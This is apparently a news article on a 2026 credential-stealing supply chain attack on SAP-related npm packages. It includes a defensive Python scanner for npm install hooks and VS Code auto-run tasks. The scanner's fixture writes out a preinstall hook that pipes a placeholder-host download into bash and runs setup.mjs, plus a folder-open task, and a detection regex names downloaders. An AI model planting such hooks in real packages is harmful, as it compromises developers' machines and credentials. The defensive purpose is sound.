SAP-related npm packages hit by credential-stealing supply chain attack

SAP-related npm packages were compromised in an April 29 supply chain attack that inserted credential-stealing malware into four releases, according to a technical analysis from Aikido Security. The affected packages were mbt, @cap-js/db-service, @cap-js/postgres, and @cap-js/sqlite.

KEY FACTS

  • Packages hit: [email protected] and three @cap-js packages.
  • Release window: the suspicious versions were published on April 29, 2026, between 09:55 UTC and 12:14 UTC.
  • Malware behavior: the poisoned packages added a preinstall hook that downloaded and ran the Bun runtime.
  • Data theft: the payload was designed to steal developer, GitHub, npm, cloud, and Kubernetes secrets.

The report said the malicious code used setup.mjs as a loader for an execution file that harvested credentials and exfiltrated the data to public GitHub repositories created on the victim’s account. The payload also attempted to spread through GitHub Actions workflows and npm publishing paths.

The incident differed from earlier Shai-Hulud campaigns in several ways. The stolen data was encrypted with AES-256-GCM and RSA-4096, and the payload also added files aimed at triggering execution when an infected repository was opened in VS Code or Claude Code.
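The two persistence paths the report describes, an install-time lifecycle hook that fetches a runtime, and editor files that fire when a folder is opened, are both visible in plain JSON on disk, so a defender can triage a checkout or a `node_modules` tree for them before running anything. The scanner below is an added example, not code from Aikido Security or the affected projects; the indicator regex (Bun, curl/wget, a `setup.mjs` loader) and the VS Code `runOptions.runOn == "folderOpen"` check are assumptions about how such hooks are typically spelled, and the sample tree it builds is constructed for the demonstration.

```python
"""Triage a directory tree for npm lifecycle scripts and editor auto-run files.

Added example, not the report's or any project's own code. Indicator patterns are
assumptions; the sample tree is constructed here so the script runs offline.
"""
import json
import os
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run during `npm install` without user interaction.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed indicators: fetching or invoking Bun, generic downloaders, and the
# setup.mjs loader name the report mentions.
SUSPICIOUS = re.compile(r"\b(bun|curl|wget|Invoke-WebRequest)\b|setup\.mjs", re.I)


def scan_package_json(path: Path):
    """Return (severity, package, file, detail) for every lifecycle script found."""
    findings = []
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (ValueError, OSError):
        return findings
    scripts = data.get("scripts") or {}
    if not isinstance(scripts, dict):
        return findings
    name = data.get("name", "?")
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        severity = "high" if SUSPICIOUS.search(cmd) else "info"
        findings.append((severity, name, str(path), f"{hook}: {cmd}"))
    return findings


def scan_vscode_tasks(path: Path):
    """Flag VS Code tasks configured to run automatically when the folder opens."""
    findings = []
    try:
        # Real tasks.json files may contain comments (JSONC); a strict parser
        # would need stripping them first. The constructed sample is plain JSON.
        data = json.loads(path.read_text(encoding="utf-8"))
    except (ValueError, OSError):
        return findings
    for task in data.get("tasks", []):
        if not isinstance(task, dict):
            continue
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            findings.append(("high", ".vscode", str(path),
                             f"task {task.get('label')!r} runs on folderOpen"))
    return findings


def scan_tree(root):
    """Walk a checkout or node_modules tree and collect all findings."""
    findings = []
    for dirpath, _, filenames in os.walk(Path(root)):
        for fn in filenames:
            p = Path(dirpath) / fn
            if fn == "package.json":
                findings.extend(scan_package_json(p))
            elif fn == "tasks.json" and Path(dirpath).name == ".vscode":
                findings.extend(scan_vscode_tasks(p))
    return findings


def build_sample_tree():
    """Constructed fixture: one benign package, one with a downloader preinstall
    hook, and a .vscode/tasks.json that auto-runs on folder open."""
    root = Path(tempfile.mkdtemp(prefix="npm-triage-"))
    benign = root / "node_modules" / "ok-lib"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps({
        "name": "ok-lib", "version": "1.0.0",
        "scripts": {"test": "node test.js", "postinstall": "node-gyp rebuild"},
    }))
    bad = root / "node_modules" / "evil-lib"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "evil-lib", "version": "9.9.9",
        "scripts": {"preinstall": "curl -fsSL https://example.invalid/install | bash && bun setup.mjs"},
    }))
    vscode = root / ".vscode"
    vscode.mkdir()
    (vscode / "tasks.json").write_text(json.dumps({
        "version": "2.0.0",
        "tasks": [{"label": "bootstrap", "type": "shell", "command": "node setup.mjs",
                   "runOptions": {"runOn": "folderOpen"}}],
    }))
    return root


if __name__ == "__main__":
    for sev, pkg, file, detail in sorted(scan_tree(build_sample_tree()), reverse=True):
        print(f"[{sev:4}] {pkg:10} {detail}  ({file})")
```

Run it against a real checkout with `scan_tree("/path/to/repo")`; `info` findings are ordinary native-build hooks worth a glance, `high` findings warrant quarantining the package before any `npm install`. Installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents lifecycle hooks of this kind from running at all, at the cost of breaking packages that legitimately compile during install.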

Investigators said the compromised @cap-js releases were tied to a breached maintainer account and misuse of npm’s OIDC trusted publishing setup, while the mbt package was suspected to involve a separate token compromise. Maintainers have since released updated package versions to replace the tainted releases.

WHY IT MATTERS

The incident shows how a single poisoned npm package can expose developer credentials and cloud access across software supply chains. It also highlights the risk of build and editor settings being used as persistence paths in development environments.